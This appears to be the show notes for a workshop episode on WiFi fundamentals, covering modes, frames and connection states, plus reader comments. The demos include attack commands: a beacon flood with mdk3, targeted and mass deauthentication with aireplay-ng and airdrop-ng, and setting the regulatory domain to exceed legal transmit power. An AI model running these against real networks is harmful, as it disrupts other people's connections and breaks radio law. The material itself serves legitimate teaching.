This time on the show, part 2 of our WiFi from-the-ground-up series. Darren presents a wireless workshop at the Noisebridge hackerspace in San Francisco.

Download HD Download MP4

6 Modes of WiFi
---------------
Master - Access Point or Base Station
Managed - Infrastructure Mode (Client)

	Demo: Managed
	-------------
	iwconfig wlan0 mode manged
	iwconfig wlan0 essid pineapple
	iwconfig wlan0
	*more on associations soon

Ad-Hoc - peer to peer

	Demo: Ad-Hoc
	------------
	iwconfig wlan0 channel 1 essid myadhocnetwork mode ad-hoc

Mesh - Mesh Cloud/Network. Planned Ad-hoc
Repeater - Range Extender
Monitor (RFMON)

	Demo: Monitor Mode
	------------------
	airmon-ng start wlan2
	tshark -i mon0


Modes and your NIC
------------------
Not all wireless NICs are made the same. 
Depending on chipset and other factors your adapter may not support all 6 modes.

	Demo: Determinte your NICs available modes
	------------------------------------------
	airmon-ng # find phy#
	iw phy phy1 info | grep -A8 modes


A Word On Transmit Power
------------------------
Like channels, transmit power, or txpower, is regulated by country.
In the US, txpower has a max of 500 Milli Watts, or 20 dBm
This is hard coded into the Linux Kernel (though can be changed)
Easier than changing the kernel is to move to a country with nicer laws

	Demo: Moving to Bolivia
	-----------------------
	iw reg get
	iw reg set BO
	iwconfig wlan2 txpower 30

3 States of Wifi
----------------

State 1: Unauthenticated and Unassociated
State 2: Authenticated but Unassociated
State 3: Authenticated and Associated


WiFi Frames
-----------

Frames: Simply Data Packets
	Typically made up of: Header, Payload, Integrity Check (CRC)
Frame Header:
	Source and Destination
	Ether Type (What Protocol)
Frame Check Sequence:
	CRC
	Say that again?

WiFi Frames:
	Management Frames
	Control Frames
	Data Frames

Management Frames:
	Beacons
	Probes
	Authentications
	Associations

Beacons:
Advertise the network
Specify SSID (network name), Channels and other capabilities

	Demo: Beacon Flood Attack
	-------------------------

	airmon-ng start wlan2
	mdk3 mon0 b -f ssidlist.txt

	Demo: Analyze Beacon Frame
	--------------------------
	gksudo wireshark & disown
	wlan.fc.subtype == 0x08
	# IEEE 802.11 Beacon Frame > Frame Control > Type Management > Subtype 8
	# IEEE 802.11 Management Frame > Tagged parameters

Probe Frame
	Probe Request - Are you my friend?
	Probe Response
		- Includes capability info

	Demo: Is that a probe in your pocket or are you just happy to see me?
	---------------------------------------------------------------------
	# Look what's coming out of everyone's devices!
	airmon-ng start wlan2
	airodump-ng mon0


Authentication
	Authentication
		- Open, WEP (Shared), WPA, WPA2, WPA-Radius
	Deauthentication

Association
	Association Request - Can we be friends?
	Association Response
	Disassociation

	Demo: Analyze Connection to Open AP
	-----------------------------------

	# start wirehark on wlan2
	# Silence the noise!
	wlan.addr == 00:c0:ca:54:51:ef and not wlan.fc.subtype == 0x08

	# Passive Scan should not generate any frames
	iw dev wlan2 scan passive | grep SSID

	# Active Scan
	iw wlan2 scan | grep SSID
	Display only REQUESTS by updating wireshark filter to include "and wlan.fc.subtype == 0x04"
	Display only RESPONSES by changing 0x04 to 0x05

	airmon-ng start wlan2
	airodump-ng mon0
	# find channel for AP "pineapple"
	iwconfig wlan2 channel 11
	iwconfig mon0 channel 11
	iwconfig wlan2 | grep Frequency
	gksudo wireshark & disown

	# Filter for just pineapple and not beacons
	wlan.addr == 00:C0:CA:60:53:2E and not wlan.fc.subtype == 0x08
	# Associate
	# Filter for just phone and pineapple
	wlan.addr == 00:C0:CA:60:53:2E and wlan.addr == a0:0b:ba:ba:6a:ca
	# Probe Request SSID=Broadcast = null probe request

Deauthentication
----------------
Remember trust?

	Demo: Deauthenticate my phone!
	------------------------------
	iwconfig mon0 channel 11
	aireplay-ng -0 10 -a 00:C0:CA:60:53:2E -c A0:0B:BA:BA:6A:CA mon0

	Demo: Hella Deauthentication with Airdrop-ng
	--------------------------------------------
	# Begin demo connected to anything but pineapple
	airodump-ng --output-format csv --write /root/dump.csv mon0
	airdrop-ng -i mon0 -t /root/dump.csv-01.csv -r /root/droprules

Control Frames:
---------------
Request to Send - RTS: Can I speak?
Clear to Send - CTS: Sure! Everyone else shut up.
Acknowledgement - ACK: Cool, I got what you said ok.


Data Frames:
------------
Kittens!

Leave a Reply

Your email address will not be published. Required fields are marked *

*

5 Comments

  • pixelateddwarf 2 years ago

    getting 404s on the download links for the last 2 episodes.

  • Jack Kirby 2 years ago

    I got through all the very technical stuff on Wi-Fi and I am still alive. :P

    Thanks Darren for making it easy to understand.

  • Angel 2 years ago

    Nice !!!

  • Jennifer 1 year ago

    Darrin was incorrect. With a ham license you CAN exceed the 500mW limit of wifi. According to the American Radio Relay League’s (ARRL) band plan chart all license classes are allowed full amateur privileges between 2390-2450 MHz (among ghz bands). That covers wifi channels 1 through 8. Transmit power with an amateur license is limited to 1500 watts! :D You do of course have to abide by all the rules of amateur radio. You have to give out your call sign at the end of every transmission or every 10 minutes. One trick I read about is converting your call sign to hexadecimal and using that as your MAC address. I would also change your host name to your call sign. You also aren’t allowed to send encrypted messages except control commands to a space station or radio controlled craft. So your wifi would have to be wide open. Accessing things like Gmail might not be legal since it uses encryption. Since I have a ham license, I think I want to get a one watt alfa and move to Bolivia :D I also want to find a higher wattage wifi device I can run as an access point or do ad-hoc mode with. There are wifi amplifiers out there, they are however rather expensive.